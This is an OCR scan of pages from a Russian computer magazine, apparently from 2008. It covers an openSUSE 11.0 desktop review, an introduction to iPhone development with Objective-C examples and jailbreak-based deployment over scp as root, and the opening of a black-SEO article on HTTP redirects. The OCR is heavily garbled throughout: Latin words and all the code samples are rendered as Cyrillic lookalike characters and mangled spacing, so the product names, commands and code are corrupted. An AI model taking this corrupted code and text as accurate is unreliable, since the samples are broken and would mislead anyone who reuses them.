ющую установку документации. 

Возможность декорирования интерфейса с помощью С55 
и различные эффекты прозрачности позволили сделать 
программуустановки самой симпатичной из всех виденных 
мной. Начиная с версии 10.3, орепБІІБЕ опять«позеленел». 
Втекущей версии используется приятная темно-зеленая 
тема оформления (хотя рамки окон остались синими). Сегодня 
дистрибутив, ориентированный на десктопы, без поддержки 
30-эффектов «из коробки» вызывает разве что удивление. В 
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орепЗІІЗЕ с этим все в порядке, — для видеокарт, поддержи- 
вающих технологию, по умолчанию включен АІ6І_Х. В поставке 
идетСотрІ 2 Ризіоп с набором дополнительных плагинов 
(ЗЬоѵѵ Мойве, Мадпіііег: Мад пібуі пд біазз, ЗЬеІі: Зсаіе ѴѴІпбоѵѵ 
ІІр/Ооѵѵп, ВгідЫпеззапсІ Заіигаііоп). Присутствуют две 
программы настройки: простой Зітріе СотрігСопіід ЗеШпдз 
Мападег (СС5М) и более функциональный СотрігСопіід 
ЗеШпдз Мападег. Активация 30-эффектов производится 
одним кликом в меню СС5М. 

Для тестирования я выбрал ЫѵеСО-версии с рабочими стола- 
ми КОЕиѲКІОМЕ. 

Н Б0ЛЕЕТЕСН0ЕЗНАК0МСТВ0 

В версии 1 0.3 процесс установки дистрибутива можно было 
запустить прямо из ѴѴІпбоѵѵз. В 1 1 .0 почему-то от этого отказа- 
лись. Причем, если ты заглянешь внутрь 150-образа, то уви- 
дишьаиіогип.іпі, в котором присутствует ссылка на экзешник, 
но самого файла нет. 

Итак, при старте ОС в первом окне по <Е2> выбираем нужный 
язык и по <ЕЗ> — видеорежим. Далее процессзагрузки 
сопровождает стильная заставка с фирменным хамелеоном. 
Специальныхзамеров я не проводил, но на субъективный 
взгляд загрузка с вариантом ѲКІОМЕ происходит чуть быстрее, 
чем в ІІЬипіи 8.04 (все равно Еебога 9 с КОЕ 4 грузится шустрее 
ореп51І5Е). После выбора русского языка интерфейс как в 
КОЕ, так и в ѲКІОМЕ частично локализован. 

Внешне рабочий стол ОЫОМЕ в большинстве дистрибутивов 
мало чем отличается. Стоит заменитьтему и без подглядыва- 
ния в меню уже будеттрудно сказать, в каком из них сейчас ра- 
ботаешь. Но ореп51І5Е 1 1 .0 стоитособняком. Верхняя панель, 
где обычно находится меню запуска приложений и доступа к 
основным инструментам, отсутствует. Внешний вид гномов- 
ского окна похож на КОЕ. Меню расположено в привычном 
нижнем левом углу и подписано как Сотриіег. Чтобы меню 



6КІ0МЕ сделать схожим с Кіскоіі (некоторое время именно 
он был визитной карточкой ореп51І5Е), использовали панель 
зІаЬ ( еп.орепзизе.огд/ОЫОМЕ/ЗІаЫ . Ради удобства навигации 
задействовано несколько вкладок. Скажем, в Арріісаііопз соб- 
раны любимые приложения (Еаѵогііе Арріісаііопз): пользова- 
тель сам добавляет или удаляет нужные ссылки в эту вкладку. 
Наиболее часто запускаемые приложения автоматически 
появляются в Ресепі Арріісаііопз. Чтобы запустить остальные, 
нужно выбрать Моге Арріісаііоп и вызвать Арріісаііоп Вгоѵѵзег. 
В йоситепіз находятся ссылки для быстрого создания 
электронных документов и таблиц ОрепОііісе 2.4, а в Ріасез 
— ссылки на основные каталоги файловой системы и сетевые 
сервисы. В панели 51а Ь реализован поиск, — нетолько прило- 
жений для их последующего запуска, но и информации в лич- 
ных данных пользователя (почте, закладках браузера ит.д.). 
Замечу, что вставленная флешка была «подхвачена» авто- 
матически, но ярлык на рабочем столе не появился (в РС1 это 
работало). Носитель стал доступен в виджете Оеѵісе КІоііііег и в 
меню К — в пункте РетоѵаЫе Зіогаде. Чтобы его размонтиро- 
вать, нужно вызвать зузіпіо:/ и нажать на ссылку, соответству- 
ющую устройству. Хотя если флешку оставить в покое, система 
размонтируетее сама. 

Имена файлов, набранные в кириллице, выводились в виде 
знаков вопросов. Это касается и файлов в разделах ЕАТ32 
(с ІЧТЕ5 в этом плане проблем нет). Зато, если в раздел РАТ 
можнозайти под обычным юзером, то в ІЧТЕ5 без прав рута не 
попасть. 

Кодеки и плагины в закрытых форматах в поставке отсутству- 
ют. При попытке воспроизвести МРЗ или видеофайл всплы- 
вает сообщение о необходимости установки дополнительных 
пакетов, поэтому, когда в наличии интернет— вопрослегко 
решаем. 

Рабочее окружение 6Ы0МЕ 2.22.2 включает в себя все новин- 
ки, о которых было сказано в обзоре, посвященном Еебога 9. 




> ІП^О 

• ЫѵеСО-версия 
доступна в двух вари- 
антах: с ОМ ОМЕ 2.22.2 
и КОЕ 4.0.4. 

• Время установки 
дистрибутива сокра- 
тилось примерно в два 
раза, и теперь весь 
процесс занимает око- 
ло 20 минут. 

• Поддержка 
ореп51І5Е 1 1.0 
заявлена до 30 июня 
2010 года. В течение 
этого времени будут 
устраняться ошибки и 
проблемы, связанные 
с безопасностью. 
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Это — композиция окон с эффектами затенения и прозрачности, предпро- 
смотр при переключении между окнами по <А11>+<ТаЬ>, новая виртуальная 
файловая система ѲѴЕ5, прозрачно работающая с Сетью, и многое другое. 
По умолчанию используется версия КОЕ 4.0.4 с некоторыми пакетами из 
4.1 . Она показала себя вполне работоспособной, особенноучитывая, что 
предварительные релизы этой среды висли послезапуска первого же вид- 
жета. Кстати, количество доступных после установки виджетов на порядок 
больше, чем в Еебога. Несмотря нато, что в КЭЕ4 в качестве основного 
файлового менеджера продвигается ОоІрЫп, в орепЗІІЗЕ по дефолту 
ста ртует Ко п д и е го г. 

В ЫѵеСО есть и ІсеѴѴМ, предназначенный для слабых машин. В ВѴй-ва- 
рианте присутствуют КЭЕ 3.5.9, Хбсе 4.4.2 и другие. В репозитарии можно 
найти еще с десяток менее популярных оконных менеджеров. 

Вывод «діхіпію I дгер гепбегіпд» оповестил отом, что 30-ускорение на 
видеокарте АТІ поумолчанию включено. 

В качестве звукового сервера использован ставший уже стандартом 
для многих дистрибутивов РиІзеАисІіо. После запуска ты обнаружишь 
в панели апплетуправления основными функциями этого сервера. 
Несколько других утилит для настройки РиІзеАисІіо можно найти вменю 
Мул ьтимедиа. 

Анализ вывода сітезд, Ізрсі и другихутилит показал, что все оборудование 
определилось корректно. Щелчком по апплету ЫеіѵѵогкМападег можно 
легко настроить нетолько ЕіЬегпеі, но и ѴѴІЕІ-, ѴРІМ-, ВЭб-подключение. 

В качестве веб-браузера выбран новый Могіііа Рі гебох 3.0 ВеІа5. В РС1 
была установлена куча хрі- плагинов для воспроизведения мультиме- 
диа-файлов и расширение для работы с Веадіе. Сейчас все это почему-то 
решили убрать. Еще один интересный момент: в 6Ы0МЕ появился недавно 
вышедший проигрыватель ВапзЬее 1 .0, однако при щелчке на МРЗ старту- 
етТоіет. 

Вслед за ІІЬипіи и Еебога в орепЭІІЗЕ стала доступна система управле- 
ния правами пользователей РоІісуКіі, цель которой — дать приложениям 
единый способ повышения полномочий, например, для задач админист- 
рирования. Суровый админ может разрешить пользователю изменять 



системное время или предоставить право запускать и останавливать 
системные службы. 

Как в КОЕ, так и в 6Ы0МЕ имеются две основные утилиты для настройки 

— это Соп*гоІСеп*ег, возможности которого в 6Ы0МЕ, в общем-то, совпа- 
даютс КОЕ’шным. Все настройки разбиты на четыре группы: Оборудова- 
ние, Оформление, Персональные и Система. Некоторые первостепенные 
задачи вынесены в отдельное поле Сотгтюп Тазк. В группе Система можно 
найти только ярлыкдля настройки автоматических обновлений. 

Основные настройки ОС и установки ПО собраны в Ѵа5Т. Здесь же 
продублированы некоторые пункты из Сопігоі Сепіег. Полный список 
возможностей по настройкам Ѵа5Т не перечислить и на десяти полосах 

— очень мощная утилита с интуитивно понятным интерфейсом! В ней 
можно найти все, что только приходится конфигурировать. К примеру, 
имеется отдельный раздел Виртуализация, после выбора которого пос- 
ледуетзапрос на установку ХЕЫ и сопутствующих утилит. Для настройки 
видеоподсистемы предлагается утила 5АХ2, которая, правда, также 
является модулем Ѵа5Т. 

Наличие в поставке двух программ конфигурирования мне показалось 
излишним (ведь после доведения системы до нужного состояния вызывать 
их приходится редко). В повседневной эксплуатации вполне хватает воз- 
можностей Сопігоі Сепіег. 

Н ПОКАЗ МОД 

Если посмотреть на мажорные дистрибутивы, вышедшие весной -ле- 
том этого года, нельзя не заметить, что ІІЬипІи 8.04 и Мапбгіѵа 2008.1 
обошлись без глобальных изменений (консервативность для деск- 
топного варианта — скорее минус, чем плюс). В Еебога 9, наоборот, 
слегка перемудрили с нововведениями: использование сырого КОЕ 
4 в качестве основной рабочей среды, проблема с обновлением и ус- 
тановкой, драйверами Ыѵісііа и т.д. И только разработчикам орепЭІІЗЕ 
удалось обойти все острые углы, действительно порадовав своих 
пользователей новинками. Мы получили бочку меда, где нет ни одной 
ложки дегтя! НЕ 
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БРЕНД №1 

ДИНКМѴІКА РОСТА ТЕЛЕКАНАМЭЬ. 

Ысчк V* ЗИМА іоо* 




источник: 

Ш 6лИі*р Меі»Л 



ДОЛЯ АУДИТОРИИ ТЕЛЕКАНАЛА 2X2 СіТ-34] 4,5% МОСКВА. 200В 
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^ согііпд 



ДМИТРИЙ «ОЕМ@І\І» ТАРАСОВ 

/ А0МШ@0ТАЯА50Ѵ.ГШ 



ХСОГ 
ПОД 
іРЬопе 



ВВЕДЕНИЕ 

В РАЗРАБОТКУ ПО ДЛЯ ІРНОЫЕ 



е год с момента выпуска ІРЬопе 1.0. Можно долго 
шчимости этого события, а также критиковат^^^^^^^^шуто. 
юлитикуАрр Іе по отношению к ряду стран, в числе кото рых и Россия. 

іРЬопе — революционное мобильное ус 
задающее пла нку для остальных производителей. Попыт аемся разобраться, 
ак писать и распространять для него программные продукты^ 



I 



□ егодня сложно найти в метро такой вагон, в котором не было 
бы владельца трендовой мобилки. Популярностьустройства 
привела кформированию целого сообщества пользователей 
ІРЬопе, среди которых оказалось много опытных програм- 
мистов, за короткий срокумудрившихся взломать защиту устройства от 
использования 5ІМ-картлюбыхоператоров сотовой связи. После публикации 
средств «іаіІЬгеакіпд» (модификация прошивки с целью снятия ограничений) 
разлоченные ІРЬопе можно без проблем заказать в интернете, а также купить 
на рынке электронной техники. Для насстобой это означает возможность 
приложить свои жилистые лапы к процессу разработки ПО для ІРЬопе. 

Н РАЗРАБОТКА ПРИЛОЖЕНИЙ 
С ИСПОЛЬЗОВАНИЕМ ДВИЖКА5АРАКІ 

До официальной публикации 5йКу разработчиков не было возможности 
легальной разработки пабѵе — приложений для ІРЬопе и іРоб ТоисЬ. Учи- 
тывая огромный интерес кіРЬопе, Арріе пошла на компромисс: позволила 
сторонним разработчикам создавать так называемые виджеты — прило- 
жения, выполняемые в веб-браузере 8а1а гі , интегрированном в ІРЬопе и 
ІРоб ТоисЬ. Основным отличием виджетов от паііѵе-приложений является 
необходимость написания кода не на ОЬІесбѵе С, а с использ ованием 
стандартных веб-технологий вроде НТМІ_, 055, ^ѵа5сгірі и АТАХ. Сточки 
зрения пользователя такое приложение отличается тем, что выполняется 
в веб-браузере и открывается не путем выбора иконки из главного меню 
устройства, а при выборе закладки. Для ознакомления с процессом со- 
здания и развертывания виджетов для ІРЬопе рекомендую почитать книгу 
«Рго^еззіопаі ІРЬопе апсі іРосі ТоисЬ Ргодгаттіпд», а также заглянуть на 
ЫірУ/сІеѵеІорег.аррІе.сот/ѵѵеЬаррз/ . 

В НЕОФИЦИАЛЬНЫЙ И ОФИЦИАЛЬНЫЙ МЕТОДЫ РАЗРАБОТКИ 

Отсутствие официальной возможности создавать ПО не остановило энту- 
зиастов. Они подготовили средства разработки, позволяющие создавать 



полноценный софт для ТаіІВгеакесІ ІРЬопе. В процессе ТаіІВгеакіпд на 
аппаратустанавливается софтина с немудреным названием Іпзіаііег. С ее 
помощью пользователи могутскачивать и устанавливать необходимый 
софт из каталога, который формируется из репозиториев (их адреса пропи- 
сываются вручную в I пзІаНег). Так что ^аі^Вгеакіпд — нетолько разлочка, 
но и процедура, позволяющая получить полный доступ кфайловой системе 
ІРЬопе. Описание процесса без труда можно найти в Сети, поэтому мы не 
будем на этом останавливаться. 

Софт, распространяющийся через Іпзіаііег, написан с использованием 
«неофициального» процесса разработки. До недавнего времени иного 
пути создания и даже установки стороннего ПО в ІРЬопе не было. Но в 
марте этого года Арріе осчастливили-таки общественность публикацией 
первой беты 50К. Стех пор на офсайте разработчиков Арріе периодически 
публикуются новые версии беты 50 К и документации (на момент написания 
статьи наиболее актуальной была восьмая). 5йК представляетсобой ЮЕ 
ХСобе, набор необходимых библиотек, эмулятор и другие инструменты. В 
статье мы рассмотрим обе методики разработки софта, но предварительно 
нужно сказать несколько слов отехнологиях, использующихся при разра- 
ботке ПО для ІРЬопе. 

^ ІРНОЫЕ 05 

Технологии, лежащие в основе ОС, принято представлять в виде слоев. 

Чем выше слой — тем выше уровень абстракции и тем чаще он использу- 
ется для разработки. Нижние содержаттехнологии, предназначенные для 
выполнения низкоуровневых функций вроде базового ввода/вывода. При 
этом многиетехнологии ОС близки подуху к использующимся в настольной 
операционке. 

Нижним слоем архитектуры в нашем случае является Соге 05 . Ядро ІРЬопе 
05 базируется на адаптированном варианте ядра Мае 05 X. Как водится, 
ядро служит для управления файловой системой, потоками, базовыми ин- 
терфейсами, межпроцессорным и сетевым взаимодействием, драйверами, 
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виртуальной памятьют.д. Уровнем выше расположен СогеБегѵісез І_ауег р 
предоставляющий приложениям необходимые фундаментальные сервисы 
(типы данных, рогбп’зоске! соттипісаііоп, потоки и т.д.) . Разработчику 
редко когда приходится обращаться к этому слою напрямую, но вышеле- 
жащие слои делаюттак постоянно. Мебіа Ьауег содержит аудио-, видео- и 
графическиетехнологии, играющие важную роль в ІРЬопе 05. Данный 
уровень представляет собойудобный фреймворк, позволяющий быстро и 
легко использовать мультимедиа при разработке. 

Самый верхний слой — Сосоа ТоисЬ І_ауег. Он предоставляет высокоуров- 
невый АРІ, предназначенный для создания графических приложений, а 
также дляуправления событиями. Любые пользовательские интерфейсы 
ІРЬопе 05 и взаимодействие с пользователем проектируются с использо- 
ванием Сосоа ТоисЬ. Технология является модифицированной версией 
фреймворка Сосоа, который используется при разработке ПО для Мае 05 
X. Поэтому она имеет ряд схожих с ним черт, но содержит и нововведения, 
связанные с кардинально отличающимся механизмом ввода информации в 
ІРЬопе (мышку и клавиатуру заменяют прикосновения к экрану] и необхо- 
димые для доступа к встроенным в ІРЬопе приложениям вроде Сопіасіз и 
РН0*05. 



Необходимые знания о методах и переменных-членах конкретного объекта 
— получаются при использовании так называемой іза-переменной, указы- 
вающей, к какому конкретно классу он относится. Само собой, этот подход 
имеетсмысл применять только, еслизаранее неизвестно, к какому классу 
относится объект (или их совокупность). 

г ОЕУЕСТ МЕ55А6ІЫ6 

В ОЬіесбѵе С принята концепция — объектам оправляются сообщения в 
случае необходимости вызова какого-либо метода. Скажем, конструкция 
[геееіѵег теззаде] означает, что объекту геееіѵег посылается сооб- 
щение теззаде. По своей сути оно является именем метода суказанием 
его параметров. К примеру, вызов метода зеШібкк(іпк) объекта класса 
СКесС выглядиттак: 

[шуЕесС зеСШісШк : 2 0 . О ] ; 

Как видно, параметры метода отделяются отего названия двоеточием. 

Если обязательных параметров несколько, они также отделяются друг от 
друга с помощью двоеточия: 



Н ИЩИТЕ ЛЕОПАРДА 

Чтобы программировать под ІРЬопе, нужен Мае сустановленной Мае 05 
ХЬеорагб. Грустно, но это так. Вообще говоря, можно развернуть среду 
разработки на ІІпіх и даже пытаться писать из-под ѴМѴѴаге, но это связано с 
рядом сложностей, которые мы не в состоянии охватить в рамкахжурналь- 
ного материала, поэтому здесь и далее мы будем полагать, что работа идет в 
Мае 05Х Ьеорагб. Крометого, необходимоустановить и сконфигурировать 
50К. Описание процесса настройки рабочей станции для «неофициаль- 
ной» разработки можно прочитать в замечательной книжке «ІРЬопе Ореп 
Арріісакоп Оеѵеіортепі», которую легко найти в Сети. 

Н ОЕУЕСТІѴЕ С 

При разработке приложений для ІРЬопе 05, а также Мас05 1 0.5 и выше 
используется язык программирования ОЬІесбѵе С 2.0. Он является своеоб- 
разной надстройкой надАЫ5І С, предназначенной для гибкого объектно- 
ориентированного программирования. Не совсем понятно, чем Арріе не 
угодил С++. Многие концепции О^’есбѵе С заимствованы у одного из пер- 
вых объектно-ориентированных языков 5таШ:аІк. Тем не менее, программа 
для ІРЬопе может содержать как код на ОЬіесбѵе С, так и на С или С++. 

При компиляции используются инструменты 6І\Ш Сотрііегз Соііескоп, 
которые распознают принадлежность кода к конкретному подвиду ѲКІІІ 
С/С++ по расширению файла. В частности, С — код содержится в файлах с 
расширением * . с; С++ — код в * .шш; ОЬІесііѵе С — в * .ш. 

0 ОСОБЕННОСТИ ОЕ^ІЕСТІѴЕ С 

В 0Ьіес!іѵе С, каки в С++, присутствуют классификаторы доступа к перемен- 
ным-членам класса (©ргіѵабе, ©ргобесбесі, ©риЫіси @раскаде). 
Разница в том, что эти классификаторы действуюттолько для объектов того 
же класса или его наследников. Для доступа к переменным-членам из дру- 
гих классов необходимо реализовать соответствующие методы. Например, 
чтобы иметь возможность получать размеры объекта класса прямоуголь- 
ника из объекта класса окна, понадобится реализовать в первом метод, 
возвращающий размеры. 

Отличительным типом данных в ОЬІесбѵе С является тип іб, использующий- 
ся при динамической типизации. 

Конструкция вида ісі апОЬЬесС — это объявление указателя на объект. 
Ключевым словом для нулевого объекта (то есть для указателя, который 
ни на что не указывает) будет піі. Сам по себе іб не несетабсолютно 
никакой информации об объекте (помимотого, что это, собственно, объект). 



[шуЕесС зеСОгідіп: 30 . 0 : 5 0 . 0 ] 

Необязательные аргументы при этом разделяются запятыми: 

[геееіѵег шакеАггау : аггау , шетЬегІ, тетЬег2 , тетЬегЗ] 

Здесь метод шакеАггау имеет один обязательный параметр — аггау и 
три необязательных — шешЬегІ , шешЬег2 и тетЬегЗ. 

Как и в С, методы могут возвращатьзначения. В следующем примере буле- 
вой переменной ізСотрІебеб возвращается значение булевого метода 
ізСотрІеСесі: 

ВООЬ ізСотрІеСесІ; 

ізСотрІекесІ = [туОрегаСіоп ізСотрІекесІ] ; 

Обрати внимание, что имя переменной и метода могут совпадать. Сооб- 
щения бывают вложенными, например, одному объекту прямоугольника 
можно присвоить размеры другого: 

[шуКесС зебЗізе: [апобкегКесб зізе] ] ; 

Не запрещается посылать сообщения піі-объектам. Иногда это полезно, 
например, когда необходимоузнать, инициализирован ли объект. Сообще- 
ние, вызывающее возвращающий значение метод, будет равно нулю. 

г СОЗДАНИЕ ОБЪЕКТОВ 

В ОЬІесІіѵе С объявление класса обязательно должно содержаться в файле- 
заголовке с расширением * .к, а реализация — в файле * .ш. Объявление 
класса выделяется с помощью директивы ©іпбегіасе, а реализация 
— директивой ©ітрІетепкаСіоп. Объявление простого класса может 
выглядеть, например, так: 

#ішрогС сІЛКік/ОІКік .к> 

©іпкегіасе ЗітрІеСІазз : ЫЗОЬдеск { 

//объявление переменных 
} 

//объявление свойств и методов ©епб 
Выделение памяти для нового объекта осуществляется путем отправки 
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Упомянутые в статье 
доки, сорцы и прочий 
полезный стафф, как 
обычно, ждуттебя на 
нашем диске! 



Виджеты для ІРИопеза работой 



ІНеІІоѴѴогІсІ в ІРЬопе 



ічі! 



сообщения а Нос-классу, экземпляр которого требуется создать. Создание 
экземпляра класса Кескапдіе может выглядеть так: 

Ій ту Кее к ; 

туКеск = [Кескапдіе аііос] ; 

Метод аііос выделяет память для объекта, а также инициализирует 
нулевыми значениями все его переменные-члены — за исключением 
переменной іза, указывающей на принадлежность объекта к конкретно- 
му классу. Чтобы можно было использовать объект, необходимо провести 
более тщательную инициализацию. Обычно она выполняется путем 
вызова метода из семейства іпік: 



НеІІоШогІй. арр — созданная вручную директория, куда мы поместили 
ресурсы, исполняемый файл и манифест; 

шаіп.ш — файл, содержащий код функции таіп, с которойтрадиционно 
для С начинается выполнение программы; 

Не11оѴ7ог1й.1і и НеІІоМогІй.т — исходники класса приложения; 
МаіпѴіете.Ь. и МаіпѴіеілпт — исходники окна приложения; 

Макеіііе — файл, содержащий команды для зсік, необходимые для ком- 
пиляции и сборки приложения. 

Шаблон проекта вместе суказанными файлами можно скачать по адресу 
ЬНрУ/сІІагазоѵ.ги/ірЬопеЛіІев/ЬеЦоѵѵогІсІ.гаг или взять на нашем крутом 
0Ѵ0. 

Рассмотрим исходники проекта поближе: 




туКеск = [ [Кескапдіе аііос] іпі'С] 

Подобная инициализация обязательна для кода, содержащего от- 
правку объекту сообщений. Вообще, существует несколько разно- 
видностей методов инициализации. Каждый из них приемлем для 
объектов конкретного класса, но все начинаются с іпік. Например, 
инициализацию класса Кескапдіе на самом деле следовало бы 
проводитьс помощью метода іпікШікЪ.Розікіоп, принимающего 
аргумент зіге. 

Для получения подробной информации по 0Ь|'есбѵе С советую ознакомить- 
ся с материалами сайта ЬКрУ/сІеѵеІорег.аррІе.сот/ірЬопе . а также почитать 
документ «ТЬе ОЬіесІіѵе-С 2.0 Ргодгаттіпд І_апдиаде», который можно там 
же и скачать. 

В НЕОФИЦИАЛЬНЫЙ НЕНОѴѴОРЮ 

Рассмотрим процесс создания несложного приложения с использованием 
неофициального 50К. Информацию поустановке и настройке можно по- 
лучить в книге«іРИопеОреп Арріісаііоп йеѵеіортепі» либо на ЫірУ/сосІе. 
доодіе.сот/р/ірбопе-беѵ . 

Анатомия любого приложения для ІРИопе проста до крайности. При- 
ложение, по сути, — это директория с именем вида НеІІоТлГогІсІ . 
арр, содержащая исполняемый файл приложения, файл манифеста и 
ресурсы 

Приведем пример. В простейшем случае директория содержит обязатель- 
ные файлы: 

• Бекаиік .рпд — картинка с расширением 320x480 пикселей, отобража- 
ющаяся в устройстве в момент инициализации приложения; 

• НеІІоМогІсі — собственно, исполняемый файл приложения; 

• Ісоп. рпд — иконка приложения, отображающаяся в ЗргіпдВоагсІ; 

• іпко . ріізк — своего рода манифест приложения, файл, подготов- 
ленный вХМІ_-формате и содержащий информацию, необходимую для 
инициализации приложения. 

Наличие файлов Бекаиік . рпд, Ісоп. рпд и Іпко .ріізк обязатель- 
но для успешного старта приложения. Проектже программы примерно 
выглядиттак: 



МАІІМ.М 

# ітрогр <ІЛКік/ІЛКік .Ъ> 

#ітрогк "НеІІоЭДогІсІ.Ь." 

іпк таіп (іпк агде , скаг** агдѵ) 

{ 

ЫЗАикогеІеазеРооІ* рооі = 

[ [ЫЗАикогеІеазеРооІ аііос] іпік] ; 
гекигп ІЛАррІісакіопМаіп (агде , агдѵ, 
[НеІІоМогІсІ сіазз] ) ; 

} 



Каждое приложение для ІРЬопе содержит та кое определение функции 
таіп. В первой и второй строках содержится директива #ітрогк, 
которая выполняет схожую с #1п1ис1е функцию. Но помимо простого 
подключения файла, #ітрогк следитза тем, чтобы заголовок класса не 
включался в проектболее одного раза, заменяятем самым стандартный 
ъгагкагоипсі: 

#ікпс!ек _МУСЬАЗЗ_Н 
Мекіпе _МУСЬАЗЗ_Н 






#епс!ік 

В теле функции таіп создается пул очистки, который необходим для осво- 
бождения памяти, занимаемой удаляемыми объектами, а также создается 
и инициализируется объект приложения. После чего запускается цикл 
обработки событий. 




■ 



НЕНОѴѴОКЮ.Н 

#ітрогк <СогеРоипс1акіоп/ СогеРоипсіакіоп . Ь> 
#ітрогк <ІЛКік/ІЛКік .Ь.> 



©іпкегкасе НеІІоЭДогІсІ : ІЛАррІісакіоп 
{ 

ІІШіпсІоѵ/* ътпсіом; 
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^ согііпд 








ШѴіем* таіпѴіем; 

} 



- (ѵоісі) аррІісаІііопБісіРіпізЬЬаипсЬіпд : 

(ЫЗБоіііісаііоп* ) аБоіііісаііоп ' 

©епсі 

В этом примере объявляется класс НеІІоШогІсІ, который наследуется от 
БіАррІісаііоп. Объект создается из функции таіп. Переменные-члены 
данного класса — это объекты классов БШіпскж и ЩѴіеът Перед тем, 
как отобразить элементы пользовательского интерфейса, необходимо со- 
здать окно, которое сможет их содержать, и наполнить его контентом. Пере- 
менная тпскж необходима для создания, собственно, окна, а таіпѴіем, 
являющаяся объектом класса іЛѴіехѵ, — для наполнения окна конкретным 
содержанием. При этом окно может соде ржать несколько переменных клас- 
са ІЛѴіеѵл Метод аррІісаііопБійРіпізкБаипскіпд унаследован 
от БіАррІісаііоп, который вызывается после загрузки приложения в 
память. Он часто переопределяется для выполнения операции начального 
отображения пользовательского интерфейса следующим образом: 

НЕЫ-ОѴѴОШ-О 

# ітрогі "НеИоШогШ.к" 

# ітрогі "МаіпѴіеѵ?. А" 

©ітріетепіаііоп Не11оУ7ог1с1 

- (ѵоісі) аррІісаііопБісІРіпізЬЬаипсІтіпд : 

(БЗБоіііісаііоп* ) аБоіііісаііоп 

{ 

Міпскж = [ [БШіпс1оѵ\7- аііос] 
іпііМікСопіепіКесі : [БІНагсІмаге 
іиІІЗсгеепАррІісаііопСопіепіКесі] ] ; 

ССКесі тлгіпсІомКесі = [БІНагсілгаге 
іиІІЗсгеепАррІісаііопКесі] ; 

міпскжКесі . огідіп . х = ѵ\гіпс!оѵУК.есі . огідіп .у = О.Оі; 
таіпѴіеѵ? = [ [МаіпѴіеѵ/ аііос] 
іпіШіЫтРгаше : міпс1отлгК.есі ] ; 

[ѵ/іпсіом зеіСопіепіѴіем: таіпѴіеъП ; 

[ тѵ і псЗ-Отѵ огсІегРгопі : зеіі]; 

[ѵ/іпсіом такеКеу : зеіі] ; 

Ыіпсіом _зеіНіс!с1еп : N0] ; 

} 

@епсі 

Здесь мы создали окно, инициализировали, а также поместили в него 
контент, созданный объектом класса МаіпѴіеът 

МАШѴІЕѴѴ.Н 

#ішрогі <СогеРоипс1аііоп/СогеРоипс1аііоп .Ь> 



# ітрогі <БІКіі/БІКіі .Ь> 

#ітрогі <БІКіі/БІТехіѴіеѵ\г. Ь> 

©іпіегіасе МаіпѴіетлг : БТѴіетл; 

{ 

ІЛТехіѴіетлг* іехіѴіеѵ?; 

} 

А тут мы помещаем в определение МаіпѴіеъ? переменную-член класса 
БІТехіѴіеѵѵ. Она понадобится для отображения текста. 

МАШѴІЕѴѴ.М 

# ітрогі "МаіпѴіехѵ. Ъ." 

©ітріетепіаііоп МаіпѴіеѵ^ 

- ( ісі) іпіШіікРгате : (ССКесі) гесі 
{ 

Іі ( (зе1і== [зирег іпіШіікРгате : гесі] ) ! =пі1) 

{ 

іехіѴіеъ? = [ [БІТехіѴіем аііос] 
іпііМііЬРгате : гесі]; 

[іехіѴіем зеіТехіЗіге: 18] ; 

[іехіѴіеѵ? зеіТехі : @"Не11о , МогІсР' ] ; 

[зеіі асІсІЗиЪѵіетл;: іехіѴіеѵ^] ; 

} 

геіигп зеіі; 

} 

©епсі 

Послеуспешной инициализации объекта МаіпѴіе™ мы создаем новый 
объект, унаследованный от БіТехіѴіеот, который в свою очередь 
наследуется отбі Ѵеѵ/. БіТехіѴіеѵ^ позволяет настраивать параметры 
отображаемого текста, что мы и делаем. Азатем «накладываем» іехіѴіехѵ 
на таіпѴіеѵг 

На этом этапе приложение готово к сборке. Нужнотолько соответствующим 
образом подготовить такеіііе (см. пример изуказанной выше ссылки). 
Все, — открываем консоль, набираем команды таке и таке раскаде. 
Наше приложение готово кзаливке в ІРИопе. Для этого в устройстве долж- 
ны быть установлены пакеты В50 ЗиЬзузІет и ОрепЗЗН (можно найти в ин- 
сталлере). На устройство можно передавать файлы посредством вер. Чтобы 
перенести наше приложение в ІРИопе, выполняем следующую команду: 

зер — г НеІІоЭДогІсі. арр гооі@іРІіопе_ір : /Арріісаііопз 

Где іРІіопе_ір — ір устройства в локальной ѴѴі Рі-сети . В ответ появится 
запрос пароля. Для ІРИопе первого поколения следует ввести «аіріпе». 
Чтобы иконка приложения появилась в меню устройства, нужно либо пе- 
резапустить его, либо приконнектиться к нему по ббИ и выполнить команду 
$кі11а11 ЗргіпдВоагй. 

0 ИСПОЛЬЗОВАНИЕОФИЦИАЛЬНОГОБОК 

Официальный набор инструментов можно скачать, зарегистрировавшись 
на НКрУ/сІеѵеІорег.аррІе.сот/ірИопе . Там же доступна документация по 
использованию и общим вопросам разработки для ІРИопе 2.0. Важно 
понимать, чтосозданный с использованием официального 5йК софт ори- 
ентирован на запуск под ІРИопе версии 2.0. На момент написания статьи 
получить прошивку 2. 0 и загрузить написанное в ХСобе- приложение 
(ЮЕ, идущее в комплекте с50К)моглилишь разработчики, участвующие 
в Арріе Оеѵеіорег Ргодгат. Проблема втом, что найти человека, которо- 
муудалось стать участником Арріе Оеѵеіорег Ргодгат, автору неудалось. 
Это можетбыть связано стем, что АОР на момент подготовки материала 
еще не была запущена, либо стем, что на период бета-тестирования 
50К Арріе решили подстраховаться и дать возможность полноценной 
разработки ПО лишь избранным компаниям. Вероятнее всего, к моменту, 
когда ты прочтешь эти строки, финальная версия ЭйКуже станет доступ- 
на и внесет ясность относительно перспектив софта, написанного с его 
использованием. т 
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НИКОЛАИ БАЙБОРОДИН 



ВАІВОВООІЫ@СМАІІ..СОМ 
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СЛИВАЕМ 

ТРАФИКИ 



Сегодня речь пойдет не о том, как замутить код реал из ации мето да ЪаЫо. 
ееД), а об одной серьезной проблеме, с которой приходится сталкиваться 



ногим Віаск 5Е0. Самую суть этой проблемы можно выразить всего двумя 

ЦП Ц И* ’й 

ювами: бан оедиоекта.ші ./ Пшр ■” 



303 — «ЗееоІЬег» 

304 — «N 01 МосШіесІ» 

305 § «ІІзе Ргоху» 

ЩД «ШпизесП» 

307 — «Тетрогагу Весіігесі» 

Основными здесь являются редиректы заномерамиЗОІ и302. Реди- 
рект 301 используется в том случае, если ты сменил своего хосте ра 
или поменял структуру проекта, в результате чего изменился адрес 
страницы, для которой оформляется редирект. Запомни, гринго, что 
единственная ситуация, в которой, будучи в трезвом уме и здравой 
памяти, можно использовать 301 — это изменение постоянного адре- 
са страницы. В этом случае редирект позволяет сохранить нажитые 
непосильным трудом РР иТИЦ. Можно сказать, это склейка старой 
страницы и нового адреса. 

Из вышесказанного можно сделать вывод о том, когда нужно испол ь- 
